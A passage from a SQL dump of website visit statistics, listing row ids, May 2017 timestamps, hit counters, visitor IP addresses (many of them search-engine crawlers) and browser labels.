95102395,1,0,1,0,'66.249.76.113',''),(111490,1495102525,1,1,0,0,'91.209.11.236','other'),(111491,1495102560,1,1,0,0,'66.249.66.87','chrome'),(111492,1495102580,1,1,0,0,'91.196.178.69','firefox'),(111493,1495103030,1,1,0,0,'164.132.161.19','other'),(111494,1495103285,1,1,0,0,'164.132.161.96','other'),(111495,1495103443,1,0,1,0,'66.249.76.113',''),(111496,1495103587,1,1,0,0,'164.132.161.33','other'),(111497,1495103643,1,0,1,0,'66.249.76.137',''),(111498,1495103660,1,1,0,0,'109.236.81.168','chrome'),(111499,1495103874,1,0,1,0,'68.180.228.186',''),(111500,1495104036,1,1,0,0,'164.132.164.180','other'),(111501,1495104517,1,0,1,0,'66.249.66.180',''),(111502,1495104721,1,1,0,0,'164.132.161.59','other'),(111503,1495104955,1,0,1,0,'66.249.76.114',''),(111504,1495105021,1,1,0,0,'91.196.178.166','chrome'),(111505,1495105149,1,1,0,0,'91.196.178.68','chrome'),(111506,1495105159,1,1,0,0,'95.108.179.15','other'),(111507,1495105213,1,1,0,0,'164.132.162.155','other'),(111508,1495105461,1,1,0,0,'109.236.81.168','chrome'),(111509,1495105696,1,1,0,0,'91.209.11.236','other'),(111510,1495105937,1,1,0,0,'157.55.39.135','other'),(111511,1495105991,1,1,0,0,'51.255.65.49','other'),(111512,1495106439,1,1,0,0,'91.196.178.68','chrome'),(111513,1495106886,1,1,0,0,'217.182.132.184','other'),(111514,1495106941,13,13,0,0,'91.209.11.236','other'),(111515,1495106948,1,1,0,0,'164.132.161.40','other'),(111516,1495107080,1,1,0,0,'195.10.210.49','chrome'),(111517,1495107148,1,1,0,0,'51.255.65.87','other'),(111518,1495107260,1,1,0,0,'109.236.81.168','chrome'),(111519,1495107264,1,1,0,0,'157.55.39.152','other'),(111520,1495107570,1,1,0,0,'176.31.231.10','other'),(111521,1495107697,1,0,1,0,'66.249.66.183',''),(111522,1495107702,1,0,1,0,'66.249.76.113',''),(111523,1495107707,1,0,1,0,'66.249.66.84',''),(111524,1495107718,1,0,1,0,'66.249.76.112',''),(111525,1495107953,3,3,0,0,'91.209.11.236','other'),(111526,1495108057,1,1,0,0,'217.182.132.180','other'),(111527,1495108119,1,1,0,0,'164.132.162.154','other'),(111528,1495108136,1,1,0,0,'31.43.22.191','chrome'),(111529,1495108858,6,6,0,0,'91.209.11.236','other'),(111530,1495108964,1,1,0,0,'77.222.140.6','firefox'),(111531,1495109061,1,1,0,0,'109.236.81.168','chrome'),(111532,1495109066,1,1,0,0,'163.172.108.151','chrome'),(111533,1495109078,1,0,1,0,'66.249.66.81',''),(111534,1495109251,1,1,0,0,'51.255.65.84','other'),(111535,1495109333,1,1,0,0,'217.182.132.70','other'),(111536,1495109378,1,1,0,0,'8.29.198.26','other'),(111537,1495109771,4,4,0,0,'91.209.11.236','other'),(111538,1495109844,1,1,0,0,'51.255.65.45','other'),(111539,1495109931,1,1,0,0,'217.182.132.81','other'),(111540,1495109934,1,1,0,0,'46.133.57.67','firefox'),(111541,1495110420,3,3,0,0,'46.175.22.142','firefox'),(111542,1495110653,1,1,0,0,'91.196.177.46','firefox'),(111543,1495110727,6,6,0,0,'91.209.11.236','other'),(111544,1495110736,1,0,1,0,'68.180.228.186',''),(111545,1495110860,1,1,0,0,'109.236.81.168','chrome'),(111546,1495111275,1,1,0,0,'149.220.35.124','firefox'),(111547,1495111348,1,1,0,0,'46.133.57.67','firefox'),(111548,1495111624,1,1,0,0,'91.196.178.68','chrome'),(111549,1495111864,1,1,0,0,'195.64.190.1','firefox'),(111550,1495111884,1,1,0,0,'51.255.65.27','other'),(111551,1495111891,1,1,0,0,'141.8.142.15','other'),(111552,1495112271,1,1,0,0,'164.132.161.67','other'),(111553,1495112345,1,0,1,0,'66.249.76.137',''),(111554,1495112363,1,0,1,0,'66.249.76.113',''),(111555,1495112457,4,4,0,0,'91.209.11.236','other'),(111556,1495112479,1,1,0,0,'51.255.71.120','other'),(111557,1495112536,1,1,0,0,'185.26.180.131','other'),(111558,1495112660,1,1,0,0,'109.236.81.168','chrome'),(111559,1495112960,1,1,0,0,'95.133.192.13','chrome'),(111560,1495113079,1,1,0,0,'217.182.132.72','other'),(111561,1495113373,1,1,0,0,'46.175.22.142','firefox'),(111562,1495113394,1,1,0,0,'46.200.133.225','firefox'),(111563,1495113442,2,2,0,0,'37.53.230.170','opera'),(111564,1495113540,1,1,0,0,'164.132.161.81','other'),(111565,1495113679,1,1,0,0,'217.182.132.83','other'),(111566,1495113835,1,0,1,0,'66.249.66.183',''),(111567,1495113837,1,0,1,0,'66.249.76.131',''),(111568,1495114426,7,7,0,0,'91.209.11.236','other'),(111569,1495114461,1,1,0,0,'109.236.81.168','chrome'),(111570,1495114989,1,1,0,0,'66.249.66.183','chrome'),(111571,1495115106,1,1,0,0,'91.196.178.68','chrome'),(111572,1495115136,1,0,1,0,'66.249.76.114',''),(111573,1495115141,1,0,1,0,'66.249.76.112',''),(111574,1495115172,3,0,3,0,'66.249.76.113',''),(111575,1495115333,1,1,0,0,'91.196.178.67','chrome'),(111576,1495116259,1,1,0,0,'109.236.81.168','chrome'),(111577,1495116263,1,1,0,0,'217.182.132.97','other'),(111578,1495116325,1,1,0,0,'40.77.167.59','other'),(111579,1495116890,1,0,1,0,'66.249.76.113',''),(111580,1495117155,1,1,0,0,'164.132.161.20','other'),(111581,1495117433,1,1,0,0,'51.255.65.78','other'),(111582,1495118060,1,1,0,0,'109.236.81.168','chrome'),(111583,1495119549,1,0,1,0,'66.249.76.114',''),(111584,1495119820,1,1,0,0,'82.145.220.33','other'),(111585,1495119859,1,1,0,0,'109.236.81.168','chrome'),(111586,1495119955,1,0,1,0,'66.249.76.113',''),(111587,1495120210,1,1,0,0,'8.29.198.26','other'),(111588,1495120901,1,1,0,0,'91.196.177.15','chrome'),(111589,1495121100,1,0,1,0,'66.249.76.135',''),(111590,1495121106,1,0,1,0,'66.249.76.114',''),(111591,1495121124,1,0,1,0,'66.249.76.113',''),(111592,1495121430,1,1,0,0,'157.55.39.152','other'),(111593,1495121612,1,0,1,0,'66.249.66.84',''),(111594,1495121636,1,1,0,0,'66.249.76.135','chrome'),(111595,1495121660,1,1,0,0,'109.236.81.168','chrome'),(111596,1495122972,1,0,1,0,'66.249.76.135',''),(111597,1495122977,1,0,1,0,'66.249.76.131',''),(111598,1495123460,1,1,0,0,'109.236.81.168','chrome'),(111599,1495123785,1,0,1,0,'66.249.76.112',''),(111600,1495123969,1,0,1,0,'66.249.66.81',''),(111601,1495124572,1,0,1,0,'66.249.76.135',''),(111602,1495124626,1,0,1,0,'66.249.66.183',''),(111603,1495124642,1,1,0,0,'180.76.15.147','other'),(111604,1495125260,1,1,0,0,'109.236.81.168','chrome'),(111605,1495126030,1,1,0,0,'176.9.59.174','chrome'),(111606,1495126695,1,1,0,0,'40.77.167.59','other'),(111607,1495127060,1,1,0,0,'109.236.81.168','chrome'),(111608,1495127833,3,3,0,0,'91.209.11.236','other'),(111609,1495128092,1,0,1,0,'66.249.66.177',''),(111610,1495128149,1,1,0,0,'95.135.90.57','chrome'),(111611,1495128303,1,0,1,0,'68.180.231.24',''),(111612,1495128414,1,0,1,0,'68.180.228.186',''),(111613,1495128860,1,1,0,0,'109.236.81.168','chrome'),(111614,1495129459,1,1,0,0,'141.8.142.15','other'),(111615,1495129542,1,1,0,0,'91.196.178.65','firefox'),(111616,1495129630,1,1,0,0,'95.108.213.34','other'),(111617,1495129876,6,6,0,0,'91.209.11.236','other'),(111618,1495130203,1,0,1,0,'66.249.76.137',''),(111619,1495130210,1,0,1,0,'66.249.66.180',''),(111620,1495130244,1,1,0,0,'91.196.178.165','chrome'),(111621,1495130343,1,0,1,0,'66.249.76.114',''),(111622,1495130525,1,1,0,0,'217.182.132.96','other'),(111623,1495130663,1,1,0,0,'109.236.81.168','chrome'),(111624,1495130878,6,6,0,0,'91.209.11.236','other'),(111625,1495131037,1,1,0,0,'8.29.198.27','other'),(111626,1495131442,1,1,0,0,'46.133.190.76','chrome'),(111627,1495131452,1,1,0,0,'46.133.190.76','other'),(111628,1495131813,1,1,0,0,'217.182.132.63','other'),(111629,1495131877,1,1,0,0,'176.31.231.10','other'),(111630,1495131899,1,1,0,0,'91.196.178.165','chrome'),(111631,1495132460,1,1,0,0,'109.236.81.168','chrome'),(111632,1495132494,1,1,0,0,'164.132.161.39','other'),(111633,1495132560,1,0,1,0,'66.249.76.114',''),(111634,1495132764,4,4,0,0,'91.209.11.236','other'),(111635,1495132916,1,1,0,0,'164.132.161.12','other'),(111636,1495132995,1,1,0,0,'95.132.187.228','chrome'),(111637,1495133059,1,1,0,0,'79.137.150.186','chrome'),(111638,1495133304,1,1,0,0,'217.182.132.62','other'),(111639,1495133360,1,1,0,0,'51.255.65.35','other'),(111640,1495134219,4,4,0,0,'91.209.11.236','other'),(111641,1495134260,1,1,0,0,'109.236.81.168','chrome'),(111642,1495134622,1,0,1,0,'66.249.76.113',''),(111643,1495134966,1,0,1,0,'66.249.76.112',''),(111644,1495135325,1,1,0,0,'51.255.65.68','other'),(111645,1495135564,1,1,0,0,'157.55.39.152','other'),(111646,1495135717,2,2,0,0,'91.209.11.236','other'),(111647,1495135728,1,1,0,0,'164.132.161.73','other'),(111648,1495135877,1,0,1,0,'66.249.76.137',''),(111649,1495135891,1,0,1,0,'66.249.76.114',''),(111650,1495135898,1,0,1,0,'66.249.76.112',''),(111651,1495135910,1,1,0,0,'51.255.65.44','other'),(111652,1495136060,1,1,0,0,'109.236.81.168','chrome'),(111653,1495136319,1,1,0,0,'51.255.65.40','other'),(111654,1495136628,4,4,0,0,'5.9.88.103','other'),(111655,1495136723,1,1,0,0,'164.132.161.85','other'),(111656,1495136756,1,1,0,0,'164.132.162.156','other'),(111657,1495137483,1,1,0,0,'137.74.201.100','other'),(111658,1495137553,1,1,0,0,'51.255.65.40','other'),(111659,1495137611,1,1,0,0,'51.255.65.80','other'),(111660,1495137628,1,1,0,0,'164.132.161.79','other'),(111661,1495137861,1,1,0,0,'109.236.81.168','chrome'),(111662,1495138238,1,1,0,0,'164.132.161.16','other'),(111663,1495138611,1,0,1,0,'66.249.76.135',''),(111664,1495138655,1,1,0,0,'157.55.39.152','other'),(111665,1495138742,1,1,0,0,'157.55.39.135','other'),(111666,1495138775,1,1,0,0,'51.255.65.22','other'),(111667,1495139660,1,1,0,0,'109.236.81.168','chrome'),(111668,1495139953,1,1,0,0,'66.249.66.180','chrome'),(111669,1495140176,1,1,0,0,'51.255.65.50','other'),(111670,1495140203,1,1,0,0,'217.182.132.20','other'),(111671,1495140353,1,0,1,0,'66.249.76.135',''),(111672,1495140560,1,1,0,0,'164.132.161.72','other'),(111673,1495140785,1,1,0,0,'51.255.65.86','other'),(111674,1495141266,1,1,0,0,'51.255.65.18','other'),(111675,1495141460,1,1,0,0,'109.236.81.168','chrome'),(111676,1495141871,1,1,0,0,'8.29.198.26','other'),(111677,1495142458,1,0,1,0,'66.249.76.135',''),(111678,1495142472,1,0,1,0,'66.249.76.114',''),(111679,1495142479,1,0,1,0,'66.249.76.112',''),(111680,1495142487,2,0,2,0,'66.249.76.131',''),(111681,1495142506,1,1,0,0,'217.182.132.68','other'),(111682,1495142508,1,0,1,0,'66.249.66.81',''),(111683,1495143260,1,1,0,0,'109.236.81.168','chrome'),(111684,1495143353,1,1,0,0,'164.132.161.84','other'),(111685,1495143894,2,0,2,0,'66.249.76.112',''),(111686,1495143959,1,1,0,0,'51.255.65.60','other'),(111687,1495144012,1,1,0,0,'66.249.66.177','chrome'),(111688,1495144037,1,0,1,0,'68.180.231.24',''),(111689,1495144300,1,1,0,0,'51.255.65.96','other'),(111690,1495144586,1,1,0,0,'157.55.39.135','other'),(111691,1495144631,1,1,0,0,'164.132.161.63','other'),(111692,1495144713,3,3,0,0,'54.165.59.7','other'),(111693,1495145039,1,1,0,0,'217.182.132.146','other'),(111694,1495145060,1,1,0,0,'109.236.81.168','chrome'),(111695,1495145217,1,0,1,0,'68.180.231.24',''),(111696,1495145497,1,1,0,0,'217.182.132.17','other'),(111697,1495145670,1,1,0,0,'164.132.161.44','other'),(111698,1495146029,1,1,0,0,'157.55.39.135','other'),(111699,1495146030,1,0,1,0,'66.249.66.84',''),(111700,1495146040,1,1,0,0,'217.182.132.241','other'),(111701,1495146234,1,0,1,0,'66.249.76.114',''),(111702,1495146648,1,1,0,0,'40.77.167.59','other'),(111703,1495146784,1,1,0,0,'164.132.161.63','other'),(111704,1495146860,1,1,0,0,'109.236.81.168','chrome'),(111705,1495146862,1,0,1,0,'66.249.66.87',''),(111706,1495147223,1,1,0,0,'164.132.161.42','other'),(111707,1495147307,1,1,0,0,'217.182.132.85','other'),(111708,1495147751,1,0,1,0,'66.249.66.84',''),(111709,1495147765,1,0,1,0,'66.249.76.113',''),(111710,1495147780,1,0,1,0,'66.249.76.112',''),(111711,1495148251,4,4,0,0,'91.209.11.236','other'),(111712,1495148447,1,1,0,0,'164.132.161.85','other'),(111713,1495148664,1,1,0,0,'109.236.81.168','chrome'),(111714,1495149642,1,0,1,0,'66.249.76.137',''),(111715,1495149743,1,1,0,0,'51.255.65.51','other'),(111716,1495150109,1,1,0,0,'217.182.132.17','other'),(111717,1495150460,1,1,0,0,'109.236.81.168','chrome'),(111718,1495150560,1,1,0,0,'217.182.132.55','other'),(111719,1495151732,1,0,1,0,'66.249.76.135',''),(111720,1495152260,1,1,0,0,'109.236.81.168','chrome'),(111721,1495152275,1,0,1,0,'66.249.66.84',''),(111722,1495152708,1,1,0,0,'8.29.198.27','other'),(111723,1495153318,1,0,1,0,'66.249.76.137',''),(111724,1495153343,1,0,1,0,'66.249.66.183',''),(111725,1495153361,1,1,0,0,'66.249.76.114','chrome'),(111726,1495153557,1,0,1,0,'66.249.66.87',''),(111727,1495154062,1,1,0,0,'109.236.81.168','chrome'),(111728,1495154629,1,0,1,0,'66.249.66.87',''),(111729,1495155003,1,1,0,0,'141.8.142.15','other'),(111730,1495155007,1,1,0,0,'178.154.189.14','other'),(111731,1495155029,1,1,0,0,'93.158.152.79','other'),(111732,1495155033,1,1,0,0,'178.154.189.21','other'),(111733,1495155040,1,1,0,0,'141.8.142.154','other'),(111734,1495155046,1,1,0,0,'95.108.179.15','other'),(111735,1495155860,1,1,0,0,'109.236.81.168','chrome'),(111736,1495156017,1,0,1,0,'66.249.76.137',''),(111737,1495156024,1,0,1,0,'66.249.66.87',''),(111738,1495156032,1,0,1,0,'66.249.66.177',''),(111739,1495156037,1,0,1,0,'66.249.76.113',''),(111740,1495156839,1,1,0,0,'66.249.76.137','chrome'),(111741,1495157067,1,0,1,0,'66.249.76.114',''),(111742,1495157238,1,0,1,0,'66.249.76.112',''),(111743,1495157486,1,1,0,0,'5.255.253.58','other'),(111744,1495157660,1,1,0,0,'109.236.81.168','chrome'),(111745,1495157768,1,0,1,0,'66.249.66.81',''),(111746,1495158533,1,0,1,0,'66.249.76.112',''),(111747,1495158553,6,6,0,0,'95.108.213.32','other'),(111748,1495158556,1,1,0,0,'141.8.183.1','other'),(111749,1495158563,1,1,0,0,'178.154.189.14','other'),(111750,1495158628,1,1,0,0,'178.154.189.29','other'),(111751,1495158645,1,1,0,0,'5.255.253.28','other'),(111752,1495158664,1,1,0,0,'141.8.132.72','other'),(111753,1495158673,2,2,0,0,'178.154.189.21','other'),(111754,1495158688,4,4,0,0,'178.154.189.16','other'),(111755,1495158705,5,5,0,0,'5.255.253.83','other'),(111756,1495158769,3,3,0,0,'178.154.200.45','other'),(111757,1495158813,1,1,0,0,'95.108.213.7','other'),(111758,1495158826,4,4,0,0,'141.8.142.48','other'),(111759,1495158849,4,4,0,0,'141.8.132.43','other'),(111760,1495158880,2,2,0,0,'178.154.189.3','other'),(111761,1495158911,3,3,0,0,'95.108.179.8','other'),(111762,1495158929,1,1,0,0,'141.8.142.49','other'),(111763,1495158941,2,2,0,0,'178.154.189.22','other'),(111764,1495158948,1,1,0,0,'93.158.152.59','other'),(111765,1495158963,1,1,0,0,'141.8.142.28','other'),(111766,1495158983,2,2,0,0,'178.154.149.1','other'),(111767,1495158993,3,3,0,0,'37.9.113.43','other'),(111768,1495158995,1,1,0,0,'141.8.132.25','other'),(111769,1495158998,3,3,0,0,'178.154.200.60','other'),(111770,1495159013,5,5,0,0,'93.158.152.60','other'),(111771,1495159018,2,2,0,0,'93.158.152.77','other'),(111772,1495159021,2,2,0,0,'5.255.253.70','other'),(111773,1495159051,1,1,0,0,'37.9.113.38','other'),(111774,1495159054,4,4,0,0,'141.8.142.164','other'),(111775,1495159062,2,2,0,0,'141.8.132.50','other'),(111776,1495159141,1,1,0,0,'5.255.253.43','other'),(111777,1495159150,1,1,0,0,'178.154.200.37','other'),(111778,1495159158,2,2,0,0,'178.154.149.3','other'),(111779,1495159234,1,1,0,0,'93.158.152.79','other'),(111780,1495159250,2,2,0,0,'178.154.200.64','other'),(111781,1495159252,1,0,1,0,'66.249.66.180',''),(111782,1495159264,2,2,0,0,'95.108.179.21','other'),(111783,1495159310,1,1,0,0,'141.8.142.15','other'),(111784,1495159322,2,2,0,0,'5.255.253.81','other'),(111785,1495159335,1,1,0,0,'5.255.253.63','other'),(111786,1495159460,1,1,0,0,'109.236.81.168','chrome'),(111787,1495160828,1,0,1,0,'66.249.76.112',''),(111788,1495161261,1,1,0,0,'109.236.81.168','chrome'),(111789,1495161463,1,0,1,0,'66.249.76.114',''),(111790,1495161469,2,0,2,0,'66.249.76.113',''),(111791,1495161476,1,0,1,0,'66.249.66.177',''),(111792,1495162020,1,0,1,0,'66.249.76.112',''),(111793,1495162741,1,1,0,0,'180.76.15.21','other'),(111794,1495163060,1,1,0,0,'109.236.81.168','chrome'),(111795,1495163539,1,1,0,0,'8.29.198.25','other'),(111796,1495163712,1,0,1,0,'66.249.76.131',''),(111797,1495164350,1,1,0,0,'40.77.167.59','other'),(111798,1495164860,1,1,0,0,'109.236.81.168','chrome'),(111799,1495165134,1,1,0,0,'141.0.12.59','other'),(111800,1495165770,1,1,0,0,'5.255.253.63','other'),(111801,1495165772,1,1,0,0,'5.255.253.81','other'),(111802,1495165774,1,1,0,0,'178.154.200.37','other'),(111803,1495166501,1,0,1,0,'66.249.76.114',''),(111804,1495166507,1,0,1,0,'66.249.76.137',''),(111805,1495166522,1,0,1,0,'66.249.66.180',''),(111806,1495166660,1,1,0,0,'109.236.81.168','chrome'),(111807,1495167502,1,1,0,0,'37.9.113.5','other'),(111808,1495167503,1,1,0,0,'93.158.152.79','other'),(111809,1495167757,4,4,0,0,'91.209.11.236','other'),(111810,1495167931,1,0,1,0,'66.249.76.112',''),(111811,1495168461,1,1,0,0,'109.236.81.168','chrome'),(111812,1495168560,1,1,0,0,'91.196.178.67','firefox'),(111813,1495168847,1,0,1,0,'66.249.76.135',''),(111814,1495168980,1,0,1,0,'66.249.76.131',''),(111815,1495169618,1,1,0,0,'217.182.132.71','other'),(111816,1495169783,1,1,0,0,'91.196.178.68','chrome'),(111817,1495170126,1,0,1,0,'68.180.228.186',''),(111818,1495170133,1,1,0,0,'51.255.65.14','other'),(111819,1495170261,1,1,0,0,'109.236.81.168','chrome'),(111820,1495170600,1,1,0,0,'217.182.132.172','other'),(111821,1495170801,1,1,0,0,'92.112.5.62','chrome'),(111822,1495170887,1,0,1,0,'66.249.66.81',''),(111823,1495170946,1,0,1,0,'66.249.76.113',''),(111824,1495171106,1,1,0,0,'164.132.161.94','other'),(111825,1495171221,1,1,0,0,'217.182.132.191','other'),(111826,1495171358,1,1,0,0,'217.182.132.67','other'),(111827,1495171486,1,1,0,0,'37.73.244.28','chrome'),(111828,1495171526,1,1,0,0,'164.132.161.71','other'),(111829,1495171961,1,1,0,0,'137.74.207.119','other'),(111830,1495172060,1,1,0,0,'173.255.134.198','chrome'),(111831,1495172651,1,1,0,0,'51.255.71.100','other'),(111832,1495172991,1,0,1,0,'66.249.66.84',''),(111833,1495172995,1,0,1,0,'66.249.76.113',''),(111834,1495173003,1,0,1,0,'66.249.76.135',''),(111835,1495173097,1,1,0,0,'51.255.65.32','other'),(111836,1495173121,1,1,0,0,'217.182.132.71','other'),(111837,1495173307,1,1,0,0,'217.182.132.51','other'),(111838,1495173456,2,2,0,0,'66.249.76.112','chrome'),(111839,1495173756,1,0,1,0,'66.249.66.177',''),(111840,1495173799,1,1,0,0,'51.255.65.75','other'),(111841,1495173861,1,1,0,0,'109.236.81.168','chrome'),(111842,1495173961,1,1,0,0,'91.196.178.165','chrome'),(111843,1495174125,1,1,0,0,'164.132.161.5','other'),(111844,1495174220,13,13,0,0,'91.209.11.236','other'),(111845,1495174232,1,1,0,0,'151.80.27.116','other'),(111846,1495174363,1,0,1,0,'66.249.76.135',''),(111847,1495174371,1,1,0,0,'8.29.198.26','other'),(111848,1495174388,1,1,0,0,'217.182.132.50','other'),(111849,1495174762,1,1,0,0,'91.196.178.169','chrome'),(111850,1495174956,1,1,0,0,'157.55.39.86','other'),(111851,1495175114,1,1,0,0,'217.182.132.19','other'),(111852,1495175361,1,1,0,0,'91.196.177.110','chrome'),(111853,1495175463,5,5,0,0,'91.209.11.236','other'),(111854,1495175659,1,0,1,0,'66.249.76.131',''),(111855,1495175664,1,1,0,0,'109.236.81.168','chrome'),(111856,1495175830,1,1,0,0,'164.132.161.42','other'),(111857,1495176373,5,5,0,0,'91.209.11.236','other'),(111858,1495176416,1,1,0,0,'194.126.180.227','chrome'),(111859,1495176424,1,1,0,0,'95.108.179.15','other'),(111860,1495176756,1,1,0,0,'91.196.178.134','firefox'),(111861,1495177026,1,1,0,0,'217.182.132.62','other'),(111862,1495177170,1,1,0,0,'164.132.161.40','other'),(111863,1495177263,1,1,0,0,'217.182.132.151','other'),(111864,1495177327,3,3,0,0,'91.209.11.236','other'),(111865,1495177464,1,1,0,0,'109.236.81.168','chrome'),(111866,1495178139,1,1,0,0,'217.182.132.56','other'),(111867,1495178399,1,1,0,0,'164.132.161.17','other'),(111868,1495178449,1,1,0,0,'217.182.132.76','other'),(111869,1495178541,1,0,1,0,'66.249.66.87',''),(111870,1495178638,1,1,0,0,'51.255.65.23','other'),(111871,1495178706,1,0,1,0,'66.249.76.113',''),(111872,1495178747,1,0,1,0,'66.249.66.84',''),(111873,1495178749,1,0,1,0,'66.249.66.183',''),(111874,1495178753,1,0,1,0,'66.249.76.131',''),(111875,1495178874,1,1,0,0,'66.249.76.131','chrome'),(111876,1495179036,1,0,1,0,'66.249.76.112',''),(111877,1495179045,1,1,0,0,'66.249.66.177','chrome'),(111878,1495179190,1,1,0,0,'217.182.132.177','other'),(111879,1495179193,19,19,0,0,'62.210.101.96','other'),(111880,1495179263,1,1,0,0,'109.236.81.168','chrome'),(111881,1495179427,1,1,0,0,'130.180.219.144','firefox'),(111882,1495179461,1,1,0,0,'164.132.161.38','other'),(111883,1495179516,1,1,0,0,'164.132.161.7','other'),(111884,1495179805,1,1,0,0,'217.182.132.57','other'),(111885,1495180061,1,1,0,0,'217.182.132.50','other'),(111886,1495180186,1,0,1,0,'66.249.76.113',''),(111887,1495180201,1,1,0,0,'176.14.208.180','chrome'),(111888,1495180206,1,0,1,0,'66.249.66.87',''),(111889,1495180282,1,1,0,0,'95.135.193.90','firefox'),(111890,1495180286,1,1,0,0,'66.249.76.137','chrome'),(111891,1495180439,1,1,0,0,'51.255.71.118','other'),(111892,1495180507,1,1,0,0,'164.132.161.66','other'),(111893,1495180605,1,1,0,0,'51.255.65.16','other'),(111894,1495181061,1,1,0,0,'109.236.81.168','chrome'),(111895,1495181514,1,1,0,0,'217.182.132.182','other'),(111896,1495181699,1,1,0,0,'95.135.232.103','chrome'),(111897,1495181785,1,1,0,0,'51.255.71.123','other'),(111898,1495181815,1,1,0,0,'95.132.89.130','chrome'),(111899,1495182349,1,0,1,0,'66.249.66.87',''),(111900,1495182409,1,1,0,0,'51.255.65.34','other'),(111901,1495182484,1,1,0,0,'51.255.65.74','other'),(111902,1495182621,1,1,0,0,'66.249.66.183','chrome'),(111903,1495182742,2,2,0,0,'91.209.11.236','other'),(111904,1495182783,1,1,0,0,'66.249.76.137','chrome'),(111905,1495182802,2,2,0,0,'66.249.76.135','chrome'),(111906,1495182862,1,1,0,0,'109.236.81.168','chrome'),(111907,1495183170,1,1,0,0,'141.8.142.15','other'),(111908,1495183737,2,2,0,0,'66.249.76.131','chrome'),(111909,1495183842,1,1,0,0,'51.255.65.41','other'),(111910,1495184384,1,1,0,0,'66.249.76.135','chrome'),(111911,1495184486,1,1,0,0,'217.182.132.55','other'),(111912,1495184661,1,1,0,0,'109.236.81.168','chrome'),(111913,1495184674,1,1,0,0,'95.134.57.139','chrome'),(111914,1495184725,2,2,0,0,'141.8.142.164','other'),(111915,1495184729,1,1,0,0,'141.8.142.15','other'),(111916,1495184732,2,2,0,0,'95.108.179.15','other'),(111917,1495184734,1,1,0,0,'5.255.253.63','other'),(111918,1495184736,2,2,0,0,'95.108.213.7','other'),(111919,1495184805,1,1,0,0,'37.52.19.101','chrome'),(111920,1495184833,1,1,0,0,'91.196.178.71','firefox'),(111921,1495184904,1,0,1,0,'66.249.66.180',''),(111922,1495184936,1,1,0,0,'91.196.178.71','other'),(111923,1495185120,1,1,0,0,'141.8.142.154','other'),(111924,1495185126,2,2,0,0,'93.158.152.79','other'),(111925,1495185129,1,1,0,0,'95.108.179.21','other'),(111926,1495185131,1,1,0,0,'141.8.142.97','other'),(111927,1495185133,1,1,0,0,'141.8.132.43','other'),(111928,1495185143,1,1,0,0,'178.154.200.37','other'),(111929,1495185144,1,1,0,0,'51.255.71.123','other'),(111930,1495185160,1,1,0,0,'217.182.132.94','other'),(111931,1495185192,1,1,0,0,'164.132.161.68','other'),(111932,1495185203,1,1,0,0,'8.29.198.25','other'),(111933,1495185228,1,1,0,0,'91.196.178.165','chrome'),(111934,1495185434,1,1,0,0,'94.179.64.186','chrome'),(111935,1495185506,1,0,1,0,'66.249.66.81',''),(111936,1495185545,1,0,1,0,'66.249.76.114',''),(111937,1495185723,1,1,0,0,'141.8.142.15','other'),(111938,1495185892,1,1,0,0,'91.196.178.71','chrome'),(111939,1495186008,1,1,0,0,'51.255.65.38','other'),(111940,1495186141,2,2,0,0,'91.209.11.236','other'),(111941,1495186162,1,1,0,0,'51.255.65.96','other'),(111942,1495186187,1,1,0,0,'51.255.65.14','other'),(111943,1495186243,1,1,0,0,'137.74.207.159','other'),(111944,1495186416,1,1,0,0,'217.182.132.5','other'),(111945,1495186461,1,1,0,0,'109.236.81.168','chrome'),(111946,1495186488,1,0,1,0,'66.249.76.112',''),(111947,1495186702,1,1,0,0,'157.55.39.135','other'),(111948,1495186825,1,0,1,0,'66.249.76.114',''),(111949,1495186826,1,0,1,0,'68.180.231.24',''),(111950,1495187047,1,0,1,0,'66.249.76.137',''),(111951,1495187074,6,6,0,0,'91.209.11.236','other'),(111952,1495187331,1,1,0,0,'178.95.247.141','chrome'),(111953,1495187392,1,1,0,0,'141.8.142.15','other'),(111954,1495187394,1,1,0,0,'95.108.179.15','other'),(111955,1495187396,1,1,0,0,'95.108.213.34','other'),(111956,1495187510,1,1,0,0,'91.196.177.110','chrome'),(111957,1495187773,1,1,0,0,'91.196.178.66','firefox'),(111958,1495187851,1,1,0,0,'91.196.178.67','firefox'),(111959,1495188092,1,1,0,0,'91.196.178.71','firefox'),(111960,1495188148,1,0,1,0,'66.249.76.131',''),(111961,1495188261,1,1,0,0,'109.236.81.168','chrome'),(111962,1495189403,1,1,0,0,'66.249.76.114','chrome'),(111963,1495189670,1,1,0,0,'157.55.39.152','other'),(111964,1495189757,1,0,1,0,'66.249.66.183',''),(111965,1495189883,1,1,0,0,'66.102.9.25','chrome'),(111966,1495190061,1,1,0,0,'109.236.81.168','chrome'),(111967,1495190604,1,0,1,0,'66.249.76.114',''),(111968,1495190841,1,0,1,0,'66.249.76.131',''),(111969,1495191169,1,1,0,0,'46.48.13.161','chrome'),(111970,1495191345,1,1,0,0,'66.249.93.208','chrome'),(111971,1495191785,4,4,0,0,'91.209.11.236','other'),(111972,1495191861,1,1,0,0,'109.236.81.168','chrome'),(111973,1495192324,1,1,0,0,'91.196.178.67','firefox'),(111974,1495192408,2,2,0,0,'91.196.178.165','chrome'),(111975,1495192501,1,0,1,0,'66.249.66.87',''),(111976,1495192504,1,0,1,0,'66.249.76.113',''),(111977,1495192520,1,0,1,0,'66.249.66.81',''),(111978,1495192526,1,0,1,0,'66.249.76.137',''),(111979,1495192531,1,0,1,0,'66.249.76.112',''),(111980,1495193336,7,7,0,0,'91.209.11.236','other'),(111981,1495193346,1,1,0,0,'37.54.19.165','firefox'),(111982,1495193661,1,1,0,0,'109.236.81.168','chrome'),(111983,1495193868,1,1,0,0,'91.196.178.68','chrome'),(111984,1495194885,1,0,1,0,'66.249.76.112',''),(111985,1495194997,4,4,0,0,'91.209.11.236','other'),(111986,1495195447,2,2,0,0,'162.210.196.97','other'),(111987,1495195461,1,1,0,0,'109.236.81.168','chrome'),(111988,1495195597,1,1,0,0,'51.255.65.36','other'),(111989,1495195819,1,0,1,0,'66.249.76.137',''),(111990,1495196041,1,1,0,0,'91.196.178.70','chrome'),(111992,1495196380,1,0,1,0,'66.249.76.112',''),(111993,1495196460,2,0,2,0,'66.249.76.131',''),(111994,1495196471,1,1,0,0,'164.132.161.46','other'),(111995,1495196476,1,1,0,0,'65.19.138.35','other'),(111996,1495196553,1,1,0,0,'51.255.65.70','other'),(111997,1495196803,1,1,0,0,'164.132.161.5','other'),(111998,1495196997,1,1,0,0,'157.55.39.152','other'),(111999,1495197011,1,1,0,0,'217.182.132.67','other'),(112000,1495197261,1,1,0,0,'109.236.81.168','chrome'),(112001,1495197301,3,1,2,0,'66.249.76.137',''),(112002,1495197332,1,1,0,0,'51